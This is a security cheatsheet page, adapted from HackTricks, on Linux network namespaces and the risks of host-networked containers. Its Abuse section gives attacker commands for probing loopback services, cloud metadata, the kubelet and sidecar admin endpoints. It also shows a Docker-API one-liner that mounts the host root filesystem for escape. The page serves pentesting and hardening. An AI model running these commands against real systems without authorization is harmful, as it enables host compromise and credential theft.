daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

network-namespace.md (12431B)


      1 ---
      2 title: "Network Namespace"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Network Namespace
     14 
     15 ## Overview
     16 
     17 The network namespace isolates network-related resources such as interfaces, IP addresses, routing tables, ARP/neighbor state, firewall rules, sockets, the UNIX-domain abstract socket namespace, and the contents of files like `/proc/net`.<sup>[[2]](#references)</sup> This is why a container can have what looks like its own `eth0`, its own local routes, and its own loopback device without owning the host's real network stack.
     18 
     19 Security-wise, this matters because network isolation is about much more than port binding. A private network namespace limits what the workload can directly observe or reconfigure. Once that namespace is shared with the host, the container may suddenly gain visibility into host listeners, host-local services, abstract AF_UNIX endpoints, and network control points that were never meant to be exposed to the application.
     20 
     21 ## Operation
     22 
     23 A freshly created network namespace begins with an empty or almost empty network environment until interfaces are attached to it. Container runtimes then create or connect virtual interfaces, assign addresses, and configure routes so the workload has the expected connectivity. In bridge-based deployments, this usually means the container sees a veth-backed interface connected to a host bridge. In Kubernetes, CNI plugins handle the equivalent setup for Pod networking.
     24 
     25 This architecture explains why `--network=host` or `hostNetwork: true` is such a dramatic change. Instead of receiving a prepared private network stack, the workload joins the host's actual one.
     26 
     27 ## Lab
     28 
     29 You can see a nearly empty network namespace with:
     30 
     31 ```bash
     32 sudo unshare --net --fork bash
     33 ip addr
     34 ip route
     35 ```
     36 
     37 And you can compare normal and host-networked containers with:
     38 
     39 ```bash
     40 docker run --rm debian:stable-slim sh -c 'ip addr || ifconfig'
     41 docker run --rm --network=host debian:stable-slim sh -c 'ss -lntp | head'
     42 ```
     43 
     44 The host-networked container no longer has its own isolated socket and interface view. That change alone is already significant before you even ask what capabilities the process has.
     45 
     46 ## Runtime Usage
     47 
     48 Docker and Podman normally create a private network namespace for each container unless configured otherwise. Kubernetes usually gives each Pod its own network namespace, shared by the containers inside that Pod but separate from the host. That means `127.0.0.1` is usually Pod-local rather than container-local: a listener bound only to localhost in one container is typically reachable from its sidecars and siblings. Incus/LXC systems also provide rich network-namespace based isolation, often with a wider variety of virtual networking setups.
     49 
     50 The common principle is that private networking is the default isolation boundary, while host networking is an explicit opt-out from that boundary.
     51 
     52 ## Misconfigurations
     53 
     54 The most important misconfiguration is simply sharing the host network namespace. This is sometimes done for performance, low-level monitoring, or convenience, but it removes one of the cleanest boundaries available to containers. Host-local listeners become reachable in a more direct way, localhost-only services may become accessible, and capabilities such as `CAP_NET_ADMIN` or `CAP_NET_RAW` become much more dangerous because the operations they enable are now applied to the host's own network environment.
     55 
     56 Another problem is overgranting network-related capabilities even when the network namespace is private. A private namespace does help, but it does not make raw sockets or advanced network control harmless.
     57 
     58 In Kubernetes, `hostNetwork: true` also changes how much faith you can place in Pod-level network segmentation. Kubernetes documents that many network plugins cannot properly distinguish `hostNetwork` Pod traffic for `podSelector` / `namespaceSelector` matching and therefore treat it as ordinary node traffic.<sup>[[1]](#references)</sup> From an attacker's point of view, that means a compromised `hostNetwork` workload should often be treated as a node-level network foothold rather than as a normal Pod still constrained by the same policy assumptions as overlay-network workloads.
     59 
     60 ## Abuse
     61 
     62 In weakly isolated setups, attackers may inspect host listening services, reach management endpoints bound only to loopback, sniff or interfere with traffic depending on the exact capabilities and environment, or reconfigure routing and firewall state if `CAP_NET_ADMIN` is present. In a cluster, this can also make lateral movement and control-plane reconnaissance easier.
     63 
     64 If you suspect host networking, start by confirming that the visible interfaces and listeners belong to the host rather than to an isolated container network:
     65 
     66 ```bash
     67 ip addr
     68 ip route
     69 ss -lntup | head -n 50
     70 ```
     71 
     72 Loopback-only services are often the first interesting discovery:
     73 
     74 ```bash
     75 ss -lntp | grep '127.0.0.1'
     76 curl -s http://127.0.0.1:2375/version 2>/dev/null
     77 curl -sk https://127.0.0.1:2376/version 2>/dev/null
     78 ```
     79 
     80 Abstract UNIX sockets are another easy-to-miss target because they are network-namespace scoped even though they do not look like TCP/UDP listeners and may not exist as filesystem paths under `/run`. A host-networked container can therefore inherit access to host-only control channels that were never bind-mounted into the container at all:
     81 
     82 ```bash
     83 ss -xap 2>/dev/null | head -n 50
     84 grep -a '@' /proc/net/unix 2>/dev/null | head -n 50
     85 ```
     86 
     87 A historical example was the `containerd-shim` abstract-socket exposure bug, but the broader lesson is more important than the specific CVE: once a workload joins the host network namespace, abstract AF_UNIX services become part of the attack surface too.<sup>[[3]](#references)</sup> If those sockets appear runtime-related or administrative, pivot to [Runtime API And Daemon Exposure](/hacktricks/linux-hardening/containers-namespaces/container-security/runtime-api-and-daemon-exposure).
     88 
     89 If network capabilities are present, test whether the workload can inspect or alter the visible stack:
     90 
     91 ```bash
     92 capsh --print | grep -E 'cap_net_admin|cap_net_raw'
     93 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null
     94 ip link show
     95 ```
     96 
     97 On modern kernels, host networking plus `CAP_NET_ADMIN` may also expose the packet path beyond simple `iptables` / `nftables` changes. `tc` qdiscs and filters are namespace-scoped too, so in a shared host network namespace they apply to the host interfaces the container can see. If `CAP_BPF` is additionally present, network-related eBPF programs such as TC and XDP loaders become relevant as well:<sup>[[4]](#references)</sup>
     98 
     99 ```bash
    100 capsh --print | grep -E 'cap_net_admin|cap_net_raw|cap_bpf'
    101 for i in $(ls /sys/class/net 2>/dev/null); do
    102   echo "== $i =="
    103   tc qdisc show dev "$i" 2>/dev/null
    104   tc filter show dev "$i" ingress 2>/dev/null
    105   tc filter show dev "$i" egress 2>/dev/null
    106 done
    107 bpftool net 2>/dev/null
    108 ```
    109 
    110 This matters because an attacker may be able to mirror, redirect, shape, or drop traffic at the host interface level, not just rewrite firewall rules. In a private network namespace those actions are contained to the container view; in a shared host namespace they become host-impacting.
    111 
    112 In cluster or cloud environments, host networking also justifies quick local recon of metadata and control-plane-adjacent services:
    113 
    114 ```bash
    115 for u in \
    116   http://169.254.169.254/latest/meta-data/ \
    117   http://100.100.100.200/latest/meta-data/ \
    118   http://127.0.0.1:10250/pods; do
    119   curl -m 2 -s "$u" 2>/dev/null | head
    120 done
    121 ```
    122 
    123 In Kubernetes, remember that compromising **any** container in a multi-container Pod also gives access to localhost listeners opened by sibling containers and sidecars because the whole Pod shares one network namespace. This becomes especially relevant with service-mesh, observability, and helper containers whose admin or debug interfaces are intentionally Pod-internal rather than cluster-wide:
    124 
    125 ```bash
    126 ss -lntup | grep -E '127.0.0.1|::1'
    127 curl -s http://127.0.0.1:15000/server_info 2>/dev/null | head
    128 curl -s http://127.0.0.1:15000/config_dump 2>/dev/null | head
    129 ```
    130 
    131 Treat "bound to localhost" as **Pod-private**, not **container-private**. After one container in the Pod is compromised, that assumption is gone.
    132 
    133 ### Full Example: Host Networking + Local Runtime / Kubelet Access
    134 
    135 Host networking does not automatically provide host root, but it often exposes services that are intentionally reachable only from the node itself. If one of those services is weakly protected, host networking becomes a direct privilege-escalation path.
    136 
    137 Docker API on localhost:
    138 
    139 ```bash
    140 curl -s http://127.0.0.1:2375/version 2>/dev/null
    141 docker -H tcp://127.0.0.1:2375 run --rm -it -v /:/mnt ubuntu chroot /mnt bash 2>/dev/null
    142 ```
    143 
    144 Kubelet on localhost:
    145 
    146 ```bash
    147 curl -k https://127.0.0.1:10250/pods 2>/dev/null | head
    148 curl -k https://127.0.0.1:10250/runningpods/ 2>/dev/null | head
    149 ```
    150 
    151 Impact:
    152 
    153 - direct host compromise if a local runtime API is exposed without proper protection
    154 - cluster reconnaissance or lateral movement if kubelet or local agents are reachable
    155 - traffic manipulation or denial of service when combined with `CAP_NET_ADMIN`
    156 
    157 ## Checks
    158 
    159 The goal of these checks is to learn whether the process has a private network stack, what routes and listeners are visible, and whether the network view already looks host-like before you even test capabilities.
    160 
    161 ```bash
    162 readlink /proc/self/ns/net   # Current network namespace identifier
    163 readlink /proc/1/ns/net      # Compare with PID 1 in the current container / pod
    164 lsns -t net 2>/dev/null      # Reachable network namespaces from this view
    165 ip netns identify $$ 2>/dev/null
    166 ip addr                      # Visible interfaces and addresses
    167 ip route                     # Routing table
    168 ss -lntup                    # Listening TCP/UDP sockets with process info
    169 ss -xap                      # UNIX sockets, including abstract namespace entries
    170 grep -a '@' /proc/net/unix   # Quick view of abstract AF_UNIX sockets in this netns
    171 ```
    172 
    173 What is interesting here:
    174 
    175 - If `/proc/self/ns/net` and `/proc/1/ns/net` already look host-like, the container may be sharing the host network namespace or another non-private namespace.
    176 - `lsns -t net` and `ip netns identify` are useful when the shell is already inside a named or persistent namespace and you want to correlate it with `/run/netns` objects from the host side.
    177 - `ss -lntup` is especially valuable because it reveals loopback-only listeners and local management endpoints. `ss -xap` and `/proc/net/unix` add the abstract-socket view that ordinary filesystem socket hunts miss.
    178 - Routes, interface names, firewall context, `tc` state, and eBPF attachments become much more important if `CAP_NET_ADMIN`, `CAP_NET_RAW`, or `CAP_BPF` is present.
    179 - In Kubernetes, failed service-name resolution from a `hostNetwork` Pod may simply mean the Pod is not using `dnsPolicy: ClusterFirstWithHostNet`, not that the service is absent.
    180 - In multi-container Pods, localhost listeners belong to the whole Pod network namespace, so check sidecars and sibling containers before assuming a loopback-only port is unreachable from the compromised container.
    181 
    182 When reviewing a container, always evaluate the network namespace together with the capability set. Host networking plus strong network capabilities is a very different posture from bridge networking plus a narrow default capability set.
    183 
    184 ## References
    185 
    186 - [1] [Kubernetes NetworkPolicy and `hostNetwork` caveats](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
    187 - [2] [Linux `network_namespaces(7)` and abstract UNIX socket isolation](https://man7.org/linux/man-pages/man7/network_namespaces.7.html)
    188 - [3] [containerd advisory: abstract Unix domain sockets exposed to host-network containers](https://github.com/containerd/containerd/security/advisories/GHSA-36xw-fx78-c5r4)
    189 - [4] [eBPF token and capability requirements for network-related eBPF programs](https://docs.ebpf.io/linux/concepts/token/)